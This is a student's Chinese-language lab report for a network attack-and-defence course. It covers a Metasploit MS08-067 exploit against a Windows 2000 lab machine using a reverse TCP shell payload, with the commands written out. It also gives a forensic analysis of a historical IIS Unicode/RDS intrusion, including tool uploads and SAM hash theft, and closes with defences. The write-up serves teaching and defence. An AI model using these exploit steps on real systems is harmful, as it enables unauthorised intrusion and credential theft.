20252907 2025-2026-2 《网络攻防实践》第六周作业
20252907 2025-2026-2 《网络攻防实践》第六周作业
1.实践内容
实践内容
(1)动手实践Metasploit windows attacker
任务:使用metasploit软件进行windows远程渗透统计实验
具体任务内容:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权
(2)取证分析实践:解码一次成功的NT系统破解攻击。
来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。
攻击者使用了什么破解工具进行攻击
攻击者如何使用这个破解工具进入并控制了系统
攻击者获得系统访问权限后做了什么
我们如何防止这样的攻击
你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么
(3)团队对抗实践:windows系统远程渗透攻击和分析。
攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)
防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。
2.实践过程
2.1 动手实践Metasploit windows attacker
启动靶机win2k和攻击机kali,查看到靶机ip地址为192.168.200.9,攻击机ip地址为192.168.200.7,测试二者之间的连通性正常


测试二者之间的连通性正常

在kali中输入命令msfconsole启动工具

输入命令search ms08_067查看漏洞ms08_067的详细信息

输入命令exploit/windows/smb/ms08_067_netapi,然后输入命令show payloads显示可攻击载荷

输入命令show options查看攻击漏洞信息

输入命令set payload generic/shell_reverse_tcp设置攻击的载荷为tcp的反向连接,然后输入命令set LHOST 192.168.200.7设置渗透攻击的主机是kali,输入命令set RHOST 192.168.200.9设置渗透攻击的靶机Win2k

输入命令show options查看当前参数列表及其默认装置

输入命令exploit开始渗透攻击,成功渗透到靶机win2k,输入命令ipconfig查看靶机的网络信息成功

2.2取证分析实践:解码一次成功的NT系统破解攻击
2.2.1 攻击者使用了什么破解工具进行攻击
将学习通上下载的文件拷贝到kali虚拟机中

使用wireshark打开刚刚拷贝的文件

使用过滤条件ip.addr == 172.16.1.106 and http过滤数据

找到117行的http数据包,根据数据包中的内容,特殊字符串%C0%AF是/的unicode编码,由此判断攻击者进行了unicode攻击并打开了boot.in文件

然后追踪其数据流,上网查阅相关资料可知,该请求属于典型老旧 IIS Unicode 目录遍历攻击,攻击者利用超长 UTF-8 特殊编码绕过服务端路径过滤规则,通过目录跳转读取系统敏感配置文件 boot.ini,以此探测目标操作系统版本信息。

继续追踪tcp流发现在146号包中有shell语句和"ADM!ROX!YOUR!WORLD"!,查阅资料知道这是RDS漏洞攻击。然后通过请求中出现专属分隔符!ADM!ROX!YOUR!WORLD!、特征 UAACTIVEDATA,同时攻击路径 /msadc/msadcs.dll/AdvancedDataFactory.Query与指令执行格式均为msadc.pl工具独有的标识特征,据此可判定攻击者采用该脚本实施漏洞利用。

2.2.2 攻击者如何使用这个破解工具进入并控制了系统
追踪140号数据,监测到海量指向msadcs.dll的 HTTP 访问请求,请求目标路径为/msadc/msadc.dll。msadcs.dll是 IIS 4.0、IIS 5.0 搭载的微软数据访问服务组件,存在高危远程代码执行漏洞 CVE-2000-0272。攻击者通常在通过 Unicode 漏洞读取服务器系统文件后,会持续扫描该组件,试图利用此漏洞提权、夺取服务器控制权。

继续追踪编号为 tcp.stream eq 11 的 TCP 通信流,请求头 Content-Type 字段中携带分隔符boundary=!ADM!ROX!YOUR!WORLD!,该标识为恶意请求专用分隔符,用于传输精心构造的攻击载荷;攻击者内置恶意 SQL 注入指令,借助 IIS 的 MSADC/RDS 漏洞完成系统命令执行。

跟踪分析tcp.stream eq 106TCP 通信流,攻击者使用账号johna2k、密码haxedj00完成 FTP 登录,账号与密码全程明文传输,未做加密防护。交互流程为:提交用户名后服务端返回 331 需密码提示,输入密码后返回 230 登录成功。登录后攻击者通过 PORT 指令建立数据通道,依次上传三款渗透工具:nc.exe(Netcat,用于反弹 Shell、端口转发)、pdump.exe(系统密码窃取工具)、samdump.dll(配套 pdump 读取 Windows SAM 账户数据库)。

2.2.3 攻击者获得系统访问权限后做了什么
追踪 1275 号数据包流量可见,攻击者首先执行net session命令查询当前会话,以此校验自身权限,但执行失败;随后执行net users枚举系统全部账户,为后续权限提升、盗取账号凭证做铺垫。

此外,攻击者在服务器内留存挑衅痕迹,新建文件README.NOW.Hax0r并写入留言,内容大致为:已知该服务器为实验设备,但仍提醒运维人员及时修复系统漏洞,带有明显的挑衅性质。

然后查看服务器工作组、查看本地用户组和查询域管理员账号,但是都失败了:

随后还使用pdump读lsass进程、抓密码哈希,但还是失败了

随后输入del samdump、del pdump等等,表明攻击者删除了之前通过ftp下载的文件,猜测攻击者想要消除痕迹然后溜走

最后抓取到攻击者执行rdisk -s指令,该程序为 Windows NT/2000 系统自带应急磁盘工具,-s参数可将存储账户密码哈希的 SAM 数据库备份至%systemroot%\repair\sam._。攻击者借此绕过权限约束间接窃取账号哈希,并将备份文件复制至 har.txt 留存,完成凭证窃取。


2.2.4 我们如何防止这样的攻击
1. 漏洞修复与系统组件加固
及时为 Windows NT/2000 系统安装 MS00-078、MS01-026、MS02-065 漏洞补丁;彻底清理 IIS 高危组件,删除/msadc、/scripts等默认虚拟目录,移除 msadcs.dll 相关文件,从根源消除 Unicode、RDS 漏洞利用入口。
2. Web 服务安全加固
遵循最小权限原则,严控 Web 运行账户权限,禁止其调用 cmd 程序、访问系统核心目录;配置访问规则拦截../、%C0%AF等目录穿越特征请求;关停闲置脚本映射、远程管理、FTP 等无用服务端口,缩减攻击面。
3. 网络流量与安全审计管控
全站部署 HTTPS 加密传输,避免账号、攻击载荷明文泄露;上线 WAF、IDS 及边界防火墙,拦截漏洞扫描与恶意命令执行行为;常态化审计 IIS 访问日志,重点监控访问 boot.ini、msadcs.dll 的异常流量,及时发现入侵行为。
2.2.5 你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么
通过4356号数据包流量可证实攻击者已识别目标为蜜罐主机,数据包内捕获攻击者执行输出指令echo best honeypot i've seen till now :),以此留言表明其察觉当前环境为蜜罐。

总结:本次流量分析完整还原攻击者针对老旧 Windows NT/IIS 环境的完整入侵链路:攻击者采用msadc.pl工具,先后利用 Unicode 路径遍历漏洞与 MSADC RDS 远程代码执行漏洞突破边界,先读取 boot.ini 确认目标系统版本,再构造恶意 SQL 载荷获取系统权限 Shell;后续通过明文 FTP 上传 nc.exe、pdump.exe、samdump.dll 等渗透工具,开展权限校验、账户枚举、凭证窃取等后渗透操作,尝试导出 SAM 数据库哈希实现账号窃取,操作结束后删除工具文件清除入侵痕迹,并留下挑衅文本。全程可通过流量内专属分隔符、特征 UA、漏洞访问路径锁定攻击工具。针对该类攻击,需从系统补丁修复、高危 IIS 组件清理、Web 服务最小权限配置、闲置服务关停、流量加密与安全设备审计多维度建立防护体系,阻断目录穿越、漏洞利用、明文传输等攻击路径。同时流量中出现攻击者标注蜜罐的输出语句,证明攻击者全程识别出目标为蜜罐环境,但仍完整执行探测、漏洞利用、内网凭证收集全流程渗透行为,仅在操作末尾清理工具消除操作痕迹。
2.3团队对抗实践:windows系统远程渗透攻击和分析
攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)
防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。
攻击机kali ip地址:172.20.10.4(赵一旭)
靶机Win2k ip地址: 172.20.10.5 (梁永超)
按照任务一步骤,攻击靶机:
依次执行:
- 连通性测试
- 连通性测试通过后,输入
msfconsole,,启动Metasploit框架控制台 - 输入指令
use exploit/windows/smb/ms08_067_netapi加载MS08-067漏洞的核心利用模块 - 输入指令
show payloads列出该漏洞可兼容的攻击载荷 - 输入指令
set payload generic/shell_reverse_tcp设置反向TCP Shell载荷 - 输入指令
set LHOST 172.20.10.4设置Kali攻击机IPset RHOST 172.20.10.5设置Win2kServer被攻击机IP - 输入指令
show options查看设置的信息 - 输入指令
exploit进行攻击

键入如下图命令:
cd .. cd .. mkdir 20252907zyx cd 20252907zyx echo hi,zhaoyixu,nicetomeetyou >>20252907zyx.txt


可以看到目标机器(梁永超的机器)出现我创建的文件夹。

分析防御时候的追踪流:
在对方攻击时,打开Kali的Wireshark软件,启动监听,可以追踪到攻击方输入的指令

3.学习中遇到的问题及解决
-
问题1:kali虚拟机与win2k靶机无法连通
-
问题1解决方案:发现win2k虚拟机是无法连接网络
将win2k连接到Vmnet8,并设置Internet协议(TCP/IP)属性从使用下面IP地址变为自动获取ip地址。
4.实践总结
通过本次系列实验,我对渗透测试框架 Metasploit 形成了系统性的认知与实操能力。本次实验以 Windows 操作系统安全攻防为核心,围绕 Metasploit 远程渗透攻击、NT 系统攻击流量取证分析、攻防团队对抗三大实践任务开展学习,完成了从漏洞利用理论知识到攻防实操落地的完整闭环,彻底打破了以往对 Windows 系统 “默认安全” 的固有认知,对系统漏洞的潜在危害、攻击链路的复杂构成以及攻防一体化的安全防护理念,建立起更加直观且深刻的理解。
Metasploit 作为业内主流的渗透测试工具,集成了大量成熟的漏洞利用模块。借助框架实操,我深入掌握了 MS08-067 漏洞的攻击原理与利用流程,切实感受到自动化渗透测试工具在攻防演练中的核心作用;流量取证分析环节中,我熟练掌握了网络流量溯源、攻击行为还原的关键方法,能够通过解析数据包提取攻击特征,完整还原整体攻击链路;而团队攻防对抗环节,高度模拟了真实网络攻防场景,让我切换攻防双视角看待网络安全博弈,清晰认识到攻击与防御的制衡关系,深刻体会到知己知彼、综合防御在网络安全防护中的重要意义。
本次实验与我而言仅是系统安全攻防学习的开端。后续我将以此为基础,持续深耕网络安全领域,在夯实基础漏洞利用能力的前提下,逐步拓展内网渗透、APT 攻击检测等进阶技术的学习与研究,严守网络安全法律法规,将所学攻防知识合理运用于合规的安全检测与防护工作中,不断提升自身网络安全综合实践能力。

浙公网安备 33010602011771号